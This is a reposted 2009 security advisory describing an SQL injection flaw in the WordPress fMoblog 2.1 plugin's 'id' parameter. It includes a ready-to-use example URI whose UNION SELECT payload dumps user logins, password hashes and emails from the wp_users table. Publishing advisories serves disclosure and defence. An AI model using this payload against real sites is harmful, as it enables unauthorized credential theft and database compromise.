|
Feeds -
Exploits
|
|
Written by strange kevin
|
|
Tuesday, 17 March 2009 21:34 |
WordPress fMoblog Plugin 'id' Parameter SQL Injection Vulnerability
-\\Bugtraq ID: 34147
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 17 2009 12:00AM
-\\Updated: Mar 17 2009 05:56PM
-\\Credit: strange kevin
-\\Vulnerable: Fredrik Fahlstad fMoblog 2.1
-\\Discussion The WordPress fMoblog plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects fMoblog 2.1; other versions may also be affected.
-\\Exploit(s)/PoC(s): An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --fMoblog Homepage http://www.fahlstad.se/wp-plugins/fmoblog (Fredrik Fahlstad) --WordPress Homepage http://wordpress.org (WordPress)
|